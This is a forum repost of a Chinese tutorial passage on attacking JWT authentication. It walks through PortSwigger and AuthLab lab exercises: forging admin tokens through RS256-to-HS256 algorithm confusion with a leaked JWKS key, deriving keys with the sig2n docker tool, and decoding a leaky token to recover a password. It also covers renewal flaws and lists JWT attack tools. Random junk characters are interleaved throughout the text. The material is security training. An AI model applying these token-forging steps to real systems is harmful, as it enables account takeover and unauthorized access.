# {. \) e$ c! v8 H D" i0 y+ u2 d! ]# O9 J" ~ {0 O Step 4:服务器有时通过映射到/jwks.json或/.well-known/jwks.json的端点将它们的公钥公开为JSON Web Key(JWK)对象,比如大家熟知的/jwks.json,这些可能被存储在一个称为密钥的jwk数组中,这就是众所周知的JWK集合,即使密钥没有公开,您也可以从一对现有的jwt中提取它' D0 G/ Y; A2 p. D9 s
' a: @9 W N& P Z2 H+ d
{
"keys": [
, V/ Z" _1 J- Q8 Y
{
"kty": "RSA",
, n, p! {* g, W- O; r$ s; Y
"e": "AQAB",
7 d1 w& A* d: k8 d. i D
"kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab",
5 X1 }* s* L' O% m! S4 o: q% B7 K
"n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ"
# |# X* n4 u0 x. Q. P0 M3 z4 H D
},
{
"kty": "RSA",
3 i6 w! Z# e( Y* Q. I5 p
"e": "AQAB",
"kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA",
"n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw"
5 {6 d9 R. }7 e$ N4 c& Q' q
}
# `8 S. P2 {& E) x; V; N% F
]
& g4 b) v |( _! d; `5 m- F
}* ?: }' b' _2 e2 k$ M2 u( j
于是乎我们可以直接访问/jwks.json接口获取到服务器的公钥信息,在此处我们将JWK复制下来,作为我们第二部的RSA Key
% w$ U( Q& s$ p
https://0aad003404004c0b817dcff9 ... ademy.net/jwks.json
% y" _* V5 k8 A
{
"keys": [
{
6 h) i) J2 p4 I, @# s) d
"kty": "RSA",
! x4 U( q- Z$ I4 P& s& H& g
"e": "AQAB",
, Y2 K4 x4 @8 |7 ^& t) n
"use": "sig",
"kid": "63624c36-bfd8-4146-888e-6d032ad4fe18",
"alg": "RS256",
"n": "zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw"
}
]
}
$ [9 {! P7 J) {: @
' `+ l$ x/ }9 \" T( P* v 8 ~; x) M) N0 ]
Step 5:在Burpsuite的JWT Editor Keys中点击"New RSA Key",用之前泄露的JWK而生成一个新的RSA Key
& V: g$ S$ Q4 W s5 N
{
) t& e3 t ~. W8 d
"kty": "RSA",
1 a) o( n* c6 d( W7 q9 {: I
"e": "AQAB",
+ \7 r3 Y+ Q- I2 V. x" ~+ r6 q) O
"use": "sig",
"kid": "63624c36-bfd8-4146-888e-6d032ad4fe18",
0 S+ O/ k% b { c) K
"alg": "RS256",
1 ?, y9 ^( g+ ^4 Z
"n": "zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw"
T/ `- C$ @4 k
}
; g& p7 ?1 h r2 z* U " E' [) c) |& h
) d9 \# s0 z2 J4 B* I$ d% I1 a7 g. s3 y2 ~9 r( I8 a2 L Step 6:选中"Copy Public Key as PEM",同时将其进行base64编码操作,保存一下得到的字符串(备注:上下的一串-----END PUBLIC KEY-----不要删掉)" |' u/ n, V! ]! c( }
0 W: t* D! [! R7 [ I4 E: X0 E+ R! x2 X! C0 V, {& \
-----BEGIN PUBLIC KEY-----
! y$ {$ J- N" j2 m. K4 A1 i* w
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzsiIsVqAKSpOnOxMKrI0
hT3p8m/NK3VoejFnt4Hx2CFzvJsZ4/9mmoIVwi/nXYr7NtNV7stOSS4MGzYdJ57t
, E2 ~' d5 D6 d) O+ ^; j/ M
4v83B9h7uI1fdKSp+L+cisg31S0Wm5B/LDnvuABFMcShJ+DKTgEYfLHaG31Judly
JdnfgNIIa0XL+wbGh7Xshf8RtzR8FC2DfApX/+KXYNnHxnTKTPXl5unBgCxyny2n
2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY+E2
R/ X3 L% \1 O1 D- E
FXIoPIt8m/VSXlsKyZpjpfXTJJZo/IqazAl1XBW6bjwWjxwee0Xbyt7M1/1dTKja
AwIDAQAB
-----END PUBLIC KEY-----. t2 {1 W6 |9 X4 f3 C+ N3 x$ D
3 R N5 G3 v& L# L9 c2 r
& H j! ~% N; e# ku7 T2 w/ k. B, ~1 j8 }1 Y. ] base64后结果:4 k8 g( W! y$ q4 U/ e
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6c2lJc1ZxQUtTcE9uT3hNS3JJMApoVDNwOG0vTkszVm9lakZudDRIeDJDRnp2SnNaNC85bW1vSVZ3aS9uWFlyN050TlY3c3RPU1M0TUd6WWRKNTd0CjR2ODNCOWg3dUkxZmRLU3ArTCtjaXNnMzFTMFdtNUIvTERudnVBQkZNY1NoSitES1RnRVlmTEhhRzMxSnVkbHkKSmRuZmdOSUlhMFhMK3diR2g3WHNoZjhSdHpSOEZDMkRmQXBYLytLWFlObkh4blRLVFBYbDV1bkJnQ3h5bnkybgoyQ3dvQ0lpWWV0N3M3WDFjM3Fod2t0V2s2eEpUbXZrcmQ4NUtCbERTeUVqQmhFUFBYcmJWZnFvOHNOeGtZK0UyCkZYSW9QSXQ4bS9WU1hsc0t5WnBqcGZYVEpKWm8vSXFhekFsMVhCVzZiandXanh3ZWUwWGJ5dDdNMS8xZFRLamEKQXdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==
: S2 P7 m b; K; o4 P: Z. |9 {* T8 Q4 i* P7 b3 g+ t
* j: j( Y0 X& d6 R- X, A# X& t! n) a& ^1 R0 ?) q4 Q Step 7:在JWT Editor Keys处,生成新的对称加密Key,用之前保存的base64编码去替换k的值# P5 y! i& j e/ }/ _
{
* S& D! |! D0 ^$ l# V. _4 A
"kty": "oct",
* M" y+ K& \/ c
"kid": "63b7b785-4d35-4cb7-bbc6-9d9e17dcf5fe",
+ n# W* u1 W, u. O5 u: p Q" N
"k": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6c2lJc1ZxQUtTcE9uT3hNS3JJMApoVDNwOG0vTkszVm9lakZudDRIeDJDRnp2SnNaNC85bW1vSVZ3aS9uWFlyN050TlY3c3RPU1M0TUd6WWRKNTd0CjR2ODNCOWg3dUkxZmRLU3ArTCtjaXNnMzFTMFdtNUIvTERudnVBQkZNY1NoSitES1RnRVlmTEhhRzMxSnVkbHkKSmRuZmdOSUlhMFhMK3diR2g3WHNoZjhSdHpSOEZDMkRmQXBYLytLWFlObkh4blRLVFBYbDV1bkJnQ3h5bnkybgoyQ3dvQ0lpWWV0N3M3WDFjM3Fod2t0V2s2eEpUbXZrcmQ4NUtCbERTeUVqQmhFUFBYcmJWZnFvOHNOeGtZK0UyCkZYSW9QSXQ4bS9WU1hsc0t5WnBqcGZYVEpKWm8vSXFhekFsMVhCVzZiandXanh3ZWUwWGJ5dDdNMS8xZFRLamEKQXdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg=="
7 c; B* G' e8 O8 a* }
}
3 n( _3 T* \6 w- ~- H " m* W$ z% {5 f% m. y
6 y9 B# r( F; M* g$ d Step 8:捕获请求数据报并将其发送到repeat模块
- e+ |$ T3 @" X, F# D9 ? 5 R5 ~5 k% u2 G
' U/ U* W7 G' h4 W 此时直接请求/admin是无法请求到的' I6 e: d" J7 x( K# D
8 ]7 N. C1 U& C
Step 9:随后修改alg为HS256,修改sub为administrator并进行Sign操作
# r" E3 B' J& J- Z0 y. ]" n; E- B
& n' z1 Q9 ^8 \4 x Step 10:重新发送数据包可以看到回显成功$ f: {) S+ T3 {8 R$ }8 _9 t y1 }
8 x, @9 {- [# m$ {* w- V3 u2 ~ 3 Z7 D8 ]( J: q+ [$ r; D5 `
# `9 F2 l! }1 |; G0 ? Step 11:请求敏感连接删除用户完成解题3 Z# ?' m; \( H+ p h# ]3 S
) t' Q; n* |5 B! D) Q ; ] f: j3 v0 M3 [
令牌派生公钥: K7 l% M' O6 K+ p1 Q
" b* D1 z% }# U F* @7 y; f& v基本介绍! e ]+ h1 ?* H! a
. V* q$ m4 I, a& i- h9 Z' D9 @3 f8 {2 @6 V
在公钥不可用的情况下您仍然可以通过使用jwt _ forgery.py之类的工具从一对现有的JWT中获取密钥来测试算法混淆,您可以在rsa_sign2n GitHub存储库中找到几个有用的脚本
8 y# g7 o) w5 a
https://github.com/silentsignal/rsa_sign2n
$ G6 M! S, w+ @* K' v
简易示例5 v" F5 n( \' H7 r% V9 K4 y( J, z4 W, f
# D5 B6 w' ^* r. z: F ^
靶场地址:
https://portswigger.net/web-secu ... with-no-exposed-key
0 {9 @% z* D# D5 \# c+ e+ d. y
9 E. i% L5 K! O# s3 `8 X) m% W/ ]( l! L" y' P5 p Step 1:安装常规操作登录登出,再登录,获取两个JWT
5 v! ^% L/ _ u3 S2 K- E ) j6 z p$ ^- d) X
+ z9 W8 O$ Y" o4 g 随后将其放到Port提供的docker工具里面运行,运行的命令如下4 z' D2 [( n/ o4 G& {7 E+ i) [8 {
6 ?0 f5 S, [9 l+ sdocker run --rm -it portswigger/sig2n <token1> <token2>
7 F# a- z2 U" u4 Q, P" h: C 1 } b+ L3 b n& d$ p# ?
1 a0 a3 t# x' A" |) A1 `: A3 Hjwt _ forgery.py脚本会输出一系列token的存在情况值) T) @% [* y+ X: O0 |$ O/ o: n
& I0 X& i J6 T4 B! _ 5 P4 I1 b; t, x
8 g) T7 q- Y0 q. c! x. }0 h& S( W+ s5 |0 \3 Y) M9 Y% T6 ^ Step 2:这里我们尝试每一个Tempered JWT,Port这里给了提示说是X.509 形式的,所以我们只需要将X.509形式的JWT进行验证即可,当Response回应200时代表token是有效的,若为302则代表了重定向,下图是一个成功的案例2 y" w0 f$ R" J% w4 [$ B, w9 v
- o" B$ C4 e: e, e6 H% ~
Step 3:将JWT的Base64编码拿过来先放到记事本里面暂存,在Burpsuite的JWT Editor Keys点击New Symmetric Key,将上面的Base64编码拿过来替换此对称密钥的k值,生成对称密钥之后进行和之前攻击一致的Sign操作- N2 N6 _1 `! ]' W" r
4 Q' ]. U' f) z) G7 q. `! o- D& u
1 m; h) v) v4 c& ^6 x 敏感信息泄露
基本介绍% n+ }2 `. r0 F8 o: |5 I& X9 E
+ n, {# T$ L7 M8 a+ y JWT敏感信息泄露是指攻击者通过某种方式获取了JWT中包含的敏感信息,例如:用户的身份、权限或其他敏感数据,这种攻击可能会导致恶意用户冒充合法用户执行未经授权的操作或者访问敏感信息,常见的JWT敏感信息泄露方式包括:5 A) c/ R$ T+ |" X8 a: |* L
! B% b, N% h' \# Z7 @7 O+ e" H 简易示例
8 G7 A' s% ?/ E5 }( z2 C) M4 R0 j: G 靶场地址:https://authlab.digi.ninja/Leaky_JWT6 d% g9 Y2 B. y+ C0 \6 r6 i
" E4 d$ h' E- C7 ]& A& g/ I0 f0 k3 e2 J7 P( D1 g3 }4 J! E 靶场JWT信息如上所示,而在实战中我们可以去抓包,如果抓到的数据包中有类似这样的JWT认证那我们就可以直接拿去解密了,我们拿到的数据是这样的:& G6 \! O- t; u1 D. q6 q% y. j
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6ImFkbWluIiwicGFzc3dvcmQiOiIyYWM5Y2I3ZGMwMmIzYzAwODNlYjcwODk4ZTU0OWI2MyIsInVzZXJuYW1lIjoiam9lIn0.6j3NrK-0C7K8gmaWeB9CCyZuQKfvVEAl4KhitRN2p5k
$ [! R( Z( A6 i
上面是一个标准的JWT认证的格式,其包含Header、Payload、Signature三个部分,每个部分之间又以"."号分割,他这里的JWT认证是经过base64加密的,所以我们这里先要拿到base64解密网站去解密一下
. w% e2 h4 Y8 j. l. j
https://base64.us/
% M; g* R8 O" E9 w
在这里我们可以看到payload部分的数据解密出来后包含password字段信息,后面解出来的是一串MD5数据,之后我们将其拿到MD5在线解密网站进行解密操作:3 k$ p& F9 Q$ \2 W) B
' \) m. P$ K9 P6 `; h! | 5 q8 Z1 H" B3 M0 `# ^( U
$ W2 k; a* ?1 H/ q! V: q' j) H0 N+ d A 随后得到密码Password1并使用其作为密码,使用joe作为用户名进行登录操作:
# I& ^% E5 |& |+ ^2 n( q% U
: i4 r$ w( E& {. H; o$ u( X 随后成功登录:* y* q" n" p( p+ x
* u j0 S" C1 ~; e' ? M4 q/ x2 X& ?2 v* S& h7 ]* G4 U: h
密钥硬编码类
基本介绍
JWT中的密钥是用于对令牌进行签名或加密的关键信息,在实现JWT时密钥通常存储在应用程序代码中即所谓的"硬编码",这种做法可能会导致以下安全问题:# f- O6 ~4 u. \5 ~# C
^8 z! X' ], b/ S5 s1 Z9 x& i( t! L2 {" u1 w: w 漏洞案例; p4 ]$ g& s, v# k
; i2 t1 @( `& J, L( ~JWT密钥硬编码:
) y: U) N+ ]' k) b, K9 h) k$ |5 [) A ~0 p6 ?
& O7 C' g" _+ i2 J( D 会话续期
& N! [6 x: j% h) ]7 d c! r 续期机制1 C- y' [- _; B8 C' y! b
) M5 C& a0 p- C( ~ K5 A JWT(JSON Web Token)的续期机制是指在JWT过期之后通过一定的方式来更新JWT令牌,使其可以继续使用以减少用户需要频繁重新登录的情况,常见的JWT续期机制包括:
+ M/ b* Q9 U/ E; E" r8 C$ k# J. f7 t. J) C; T 续期问题; X. ]! V& y( H$ s. [( _* m# c* U
& X9 `; W" o1 g$ A* I9 M7 P: x$ D. m 无限使用6 Q6 V) r" k* j/ T' u
7 J$ I2 c$ n3 Q3 M' g: K% a% r# M% b5 M4 U 用户登录成功获取到一个JWT Token,JWT Token由包含算法信息的header和包含用户非敏感信息的body以及对header和body数据签名后的sing值拼接base64后生成,body中包含用户token失效时间戳exp(默认1小时)、用户id标识u7 r, r1 ^" T. N1 [! i1 M* H! x
: K/ U8 Y) j8 t: I6 mJWT Token有效期为1小时
0 t- V* Q" G2 H7 [5 }( a
% Z. U3 a% W; F9 k Z% ?$ V
7 b( n2 j w, c/ B o" z 8 o" s1 G8 t; r P% o
, l# U* G$ O$ H v! ^8 h但是在过期后发现使用之前过期的JWT Token可以继续进行会话操作1 Y, m; T- o* r9 H) {5 g
r: ~- f `* B" [& [" M& d; x( e' m9 g) x R" K# P" w- I# I; P1 i
Token刷新缺陷. D$ f$ Y6 l3 s5 O) d/ d
8 L; h4 X' p9 \9 I* v3 l$ m0 C) t; r$ m* M2 c JWT Token在续期设计时由于代码编写错误将新老token更新逻辑设计错误,使得新Token和老Token一致,导致JWT 续期失败
- p% Z( C9 M2 j' i/ }测试效果如下:8 _1 H3 ?/ J2 Y: P- C! L
: @$ `* I/ P! N2 X0 J0 p. |+ B6 O$ q! S. a( @% {" m/ ?( Q4 T, ~
$ m" D, N1 X6 V# ^% c0 S) l) Q1 T! @9 ]) Z- H. J N个新Token生成
[/ e+ ~6 l+ y 功能测试时发现JWT Token首次生成时默认失效时120分钟,续期业务逻辑中仅在JWT Token的后1/3时间,也就是80-120分钟时进行续期操作,在此期间用户的Token会进行刷新操作,使用新的Token请求到服务器段,服务器端会返回一个新的JWT Token到前端,供前端使用,但是在续期期间旧的Token可以无限制生成多个有效的JWT Token,存在一定程度上的被利用风险
* j8 P- _9 S+ Q" j# v( i; A: t' H6 }8 P2 j' O5 K) J' j
2 y/ V' V0 w4 D. f7 q) F* t5 m# u0 a 0 k/ g2 @1 M( r8 M% @
工具集合
( L; ~9 C8 V4 V) l( B% T jwt_tool
0 ~- L. f+ w2 V; z+ V' a; y) _1 S% U/ s- t 项目地址
' X7 m; E* W. N8 F* X9 \* b https://github.com/ticarpi/jwt_tool
" R- g& ]0 }, o, A" @ 0 u" ]) t8 W5 h! {8 w1 A
1 j& R* V, Z+ [$ e: k; f' g2 }9 N& s- P 主要功能
9 p% W- |3 \# S6 R! @$ h' Q }" }; N$ J
1、检查令牌的有效性
) c& o' q5 D' p% S" ?- A
2、测试已知漏洞:
0 W' n7 X# W# J1 a6 m) q2 g
CVE-2015-2951:alg=none签名绕过漏洞
CVE-2016-10555:RS / HS256公钥不匹配漏洞
: {0 K/ E2 W1 i6 S+ X- a, f7 b: t
CVE-2018-0114:Key injection漏洞
j j# K; B8 k% d {# _
CVE-2019-20933 / CVE-2020-28637:Blank password漏洞
CVE-2020-28042:Null signature漏洞
& w5 O6 K: G9 T! O# t* M$ w
3、扫描配置错误或已知漏洞
4、Fuzz声明值以引发意外行为
5、测试secret/key file/public key/ JWKS key的有效性
$ J R& N& \8 ]/ K
6、通过高速字典攻击识别低强度key
7、时间戳篡改
8、RSA和ECDSA密钥生成和重建(来自JWKS文件)
9、伪造新的令牌头和有效载荷内容,并使用密钥或通过其他攻击方法创建新的签名
& L8 j$ \, c% F0 V 使用说明
https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool) M6 f" U, Z$ {, b8 Y
7 W* }) j, k6 u% `2 N
MyJWT' s5 {/ J# R. V7 ~! d7 }- [
项目地址/ G6 L1 g7 d1 }* }+ Y8 d
https://github.com/tyki6/MyJWT/0 `5 |% T1 P, z) \
, v. l2 q1 L' V8 ^$ J/ Y' G! \
1 b" X3 D2 ^6 h9 o& P& h2 i - l* s" ^$ W- Q
功能说明; E$ R) D- I# ? Y- c% f1 y4 `) x6 D
+ P- d3 y+ K$ S/ y5 W# N: i2 {6 S6 y9 C- l- i2 J% u% Q# q0 {* [ 辅助脚本
- m. z5 W! O0 O% G% ]) C& f# t脚本地址# `0 G" P4 J. v9 J2 `
* F! l9 \) V3 F$ c* Z3 R# ]https://gist.github.com/imparabl3/efcf4a991244b9f8f99ac39a7c8cfe6f
$ Y5 {/ L8 v: E$ O( u( P- l! h% @, i3 O
4 t: G# V* X4 y; ^ 脚本功能: ?! d u& k" h0 a9 G3 b% U( o
" h- w: S; v" |! D8 S" p# _. F& X& ] 用于利用CRLF漏洞的脚本
参考链接" c5 {9 F% D' H( L$ n& G, U/ y
https://1024tools.com/hmac
https://github.com/ticarpi/jwt_tool
% K# ?8 f# p2 E
https://www.anquanke.com/post/id/236830
https://www.freebuf.com/articles/web/337347.html
https://digi.ninja/projects/authlab.php#landleakyjwt
, G9 b- m1 y4 b) O* z$ S& u, @
https://attackdefense.com/challengedetails?cid=1424
& v, e* X( I9 D0 k F
https://github.com/wallarm/jwt-s ... er/jwt.secrets.list
https://portswigger.net/web-secu ... nverified-signature
* `% X* W L, I
* X3 _ x# \6 N, U" d. Z# ]& C原文地址:https://xz.aliyun.com/t/12906
8 r$ v; O0 G0 c& ?( {2 F9 ]3 N, d) J( F 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
$ Y" ~7 t2 p6 r1 _0 |# f) X6 @& ]; ^, m: e2 N
7 }- }& U G j; o8 a + I5 S. I' R6 x$ o @( z# O/ B& S
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |